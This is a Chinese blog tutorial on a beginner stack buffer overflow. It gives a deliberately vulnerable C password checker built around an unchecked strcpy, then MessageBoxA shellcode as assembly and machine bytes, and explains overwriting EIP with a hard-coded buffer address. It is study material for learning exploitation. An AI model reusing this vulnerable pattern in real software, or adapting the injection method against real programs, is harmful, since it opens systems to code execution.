3.简单的代码植入

最新推荐文章于 2023-03-24 14:07:03 发布
最新推荐文章于 2023-03-24 14:07:03 发布
阅读量1.9k 收藏
点赞数 2
分类专栏: 溢出学习 文章标签: buffer fp 汇编 file user c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/evi10r/article/details/7037586
版权

还是那个程序稍作修改

#include <stdio.h>
#include <windows.h>
#define  PASSWORD "1234567"

int verify_password(char *password)
{
	int authenticated;
	char buffer[44];
	authenticated=strcmp(password,PASSWORD);
	strcpy(buffer,password);
	return authenticated;
}

int main()
{
	int valid_flag=0;
	char password[1024];
	FILE *fp;
	LoadLibrary("user32.dll");
	if (!(fp=fopen("password.txt","rw+")))
	{
		printf("未找到文件!\n");
		exit(0);
	}
	fscanf(fp,"%s",password);
	valid_flag=verify_password(password);
	if (valid_flag)
	{
		printf("错误!\n");
	}
	else
	{
		printf("正确!\n");
	}
	fclose(fp);
	return 0;
}


思路是:将要执行的代码放到buffer中,eip当然覆盖为buffer的起始地址。

首先OD载入定位下buffer的起始地址。输入11个4321.。。。。查看堆栈确定起始地址是0012FAF0。

写个弹出对话框的汇编代码

		XOR EBX,EBX
		PUSH EBX
		PUSH 646F6F67h
		PUSH 646F6F67h
		MOV EAX,ESP
		PUSH EBX
		PUSH EAX
		PUSH EAX
		PUSH EBX
		MOV EAX,MessageBoxA
		CALL EAX

机器码是:
33 DB 53 68 67 6F 6F 64 68 67 6F 6F 64 8B C4 53 50 50 53 B8 EA 07 D5 77 FF D0

总共44+4(authenticated)+4(ebp)+4(eip)=56个字节,其余的补NOP。最后四字节是0012FAF0,将其对应的字符写入password文件中,运行程序弹出一个对话框。

但是点了OK之后程序崩溃,因为没有写用于安全退出代码的缘故。


W1nds
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
易语言代码植入到文件任意位置易语言源码.rar
02-23
易语言代码植入到文件任意位置易语言源码.rar 易语言代码植入到文件任意位置易语言源码.rar 易语言代码植入到文件任意位置易语言源码.rar 易语言代码植入到文件任意位置易语言源码.rar 易语言代码植入到文件任意...
Android中的代码植入
a347347347的专栏
03-17 1527
1.反编译目标文件apk 2.创建一个新工程,包名要和目标文件的包名一致,有一个和目标文件一样的类,再创建一个相似类继承上面那个类,在子类中写自己想要实现的代 码 3.将自己创建的类导出,生成 4.将自己的apk反编译,找到创建的那个子类,将其复制到目标工程(反编译过了)对应的文件夹中 5.修改目标文件夹中的清单文件(将Activity中父类名字改成子类名字),重新打包目
2.4 代码植入
qq_55202378的博客
07-22 786
栈溢出
逆向工程核心原理——代码注入
weixin_46601374的博客
12-22 2957
什么是代码注入? 代码注入是一种向目标进程插入独立运行代码并使之运行的技术,它一般调用CreateRemoteThread()API以远程线程形式运行插入的代码,所以也被称为线程注入。 使用代码注入的原因 其实,代码注入要实现的功能与DLL注入类似,但具体实施时要考虑的事项更多,使用起来 更加不便。那它的优点究竟是什么呢? 1.占用内存少 如果要注入的代码与数据较少,那么就不需要将它们做成DLL的形式再注入。此时直接采用 代码注入的方式同样能够获得与DLL注入相同的效果,且占用...
【逆向工程核心原理:代码注入】
qq_42363151的博客
03-24 1420
c代码注入和汇编代码注入
易语言源码代码植入到文件任意位置易语言源码.rar
02-16
标题和描述中提到的“易语言源码代码植入到文件任意位置”是一个关于易语言编程技巧的主题,涉及到程序设计、文件操作和内存管理等多个知识点。 1. 易语言基础:易语言的基础语法结构包括控制结构(如循环、条件...
Android Studio之Debug运行期代码植入的方法
08-27
本文将详细介绍如何在Android Studio中进行Debug运行期代码植入,这是一项非常实用的功能,可以帮助开发者快速调整和测试代码,无需反复编译和安装应用。 首先,我们了解一个基础概念:断点。断点是开发中最常用的...
代码植入到文件任意位置易语言源码.7z
05-17
"代码植入到文件任意位置"这个主题涉及到的是程序设计中的一个重要概念——代码注入。在编程中,代码注入通常指的是将一段代码插入到另一个程序或文件的执行流程中,以实现特定的功能或者达到某种目的。 易语言源码...
易语言代码植入到文件任意位置
07-22
综上所述,易语言提供的工具和方法使得代码植入、密钥管理、配置文件操作变得简单易行。通过熟练掌握这些技术,开发者可以在易语言环境中实现更复杂的软件功能,同时也提高了程序的安全性和用户体验。然而,要注意...
植入者3.0加强版
06-27
植入者3.0功能介绍:不再用再耗费大量时间和精力手动整理预选关键词,本软件自动将关键词随机植入文章中。
在源代码中插入另一个程序,然后再输出为exe文件(C/C++、Win32Asm)
11-16
前些天看到有朋友说有没有不必操作资源就可以将一个程序加入到自己的程序中,我刚好想起masm32里有个bintodb.exe可以将一 整个程序转换为byte数组,但是自己也没实际试过,这几天有时间就研究了一下,发现原来操作很简单比起操作资源也来更容易理解, 所以用win32asm做了个示例,同时也在Vc中做了测试,都是一样简单。本来想在VB中也试试的,但发现没那么简单,当我将整个数 组定义为VB格式的数组时VB竟然崩溃了···,可能是因为VB编程环境容不下这么多的数据,因为我定义了一个有2560个字节元素的 字节数组,每当复制到VB代码编辑窗口中的时候就崩溃了,所以我没有在VB中实现,但这并不代表VB一定不能实现,因为可以将这 一个数组分成好几个数组,然后在写文件的时候在一一写入,但考虑到将原本好好的数组自己拆开来就已经很繁琐了,而又要在写文件 的时候重新组合也很麻烦,所以这里就留给VB高手解决了。我宣布投降···
PE练习:在exe代码区空白地方插入代码
chenqingzhi0728的博客
11-09 726
本次练习目标: 在一个exe插入一段小代码,使其双击前先弹窗,再运行程序。 前置条件: 1.准备一个exe小程序,需要用到user32.dll的,因为 2.OD…用来查看MessageBox地址 3.WINHEX…用来编辑exe 4.PETOOL…用来查看exe的一些信息 过程 一.构建一段要插入的代码 1.1 假如我要加一个Messbox弹窗,那么我先去OD里面找到这个MESSAGEBOX的地址 我要去的目标地址就是这个:75279330 1.2. 介绍一下:E8 E9 E8 是 CALL的硬编码
160个Crackme041 Patch exe 植入代码(附C++注册机源代码)
seaaseesa的博客
10-06 647
让我们先看看游戏规则: defiler's reversme no.1 ----------------------- The task of this little, lame reverseme is to add some code to it. The code you have to add will be triggered by the 'Exit' menu and ...
代码植入
weixin_34144450的博客
12-01 529
在这里,我们第一次实实在在地接触汇编。在机器码与汇编指令之间有一种对应的关系,机器码可以表达汇编语言的意思,汇编也可以表达机器码的的意思。也就是后面要说的,代码是数据,数据也即代码指令。Nop指令的作用:http://wenwen.sogou.com/z/q570331277.htmnop指令的作用:1)就是通过nop指令的填充(nop指令一个字节),使指令按字对齐,从而减少...
代码注入的三种方法
xumaojun的专栏
08-31 2138
http://www.vckbase.com/index.php/wv/1580   目录 Windows 钩子 CreateRemoteThread 和 LoadLibrary 技术 ――进程间通信 CreateRemoteThread 和 WriteProcessMemory 技术 ――如何用该技术子类化远程控件 ――何时使用 CreateRemoteThread
Android反编译植入代码(详解,手把手)
Kido is a boy...
03-17 6104
(这篇是我13年分享在eoeandroid上的,纯粹搬过来这边跟大家分享一下。大神可以直接飘过。) 虽然说Android的反编译一直都不是什么神秘高深的技术,好久之前就已经搞过,但是闲着无聊,还是想来跟小伙伴们分享一下。 一、工欲善其事必先利其器。     反编译apk包不可少的就是apktool工具,可以上 https://code.google.com/p/android-a
Jacoco字节码植入原理(源码分析)
lxlmycsdnfree的博客
01-12 5500
首先了解jacoco agent入口类(MANIFEST.M文件声明): 入口类—PreMain: 代码: packageorg.jacoco.agent.rt.internal_6da5971; importjava.lang.instrument.Instrumentation; importorg.jacoco.agent.rt.internal_6da5971.core.
JSP 代码植入代码编程整合设计过程
最新发布
06-09
JSP代码植入代码编程整合设计过程可以分为以下几个步骤: 1. 编写JSP页面:首先,需要编写JSP页面。在JSP页面中,可以使用HTML、CSS和JavaScript来实现页面的布局和交互效果。同时,也可以使用JSP标签和脚本来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值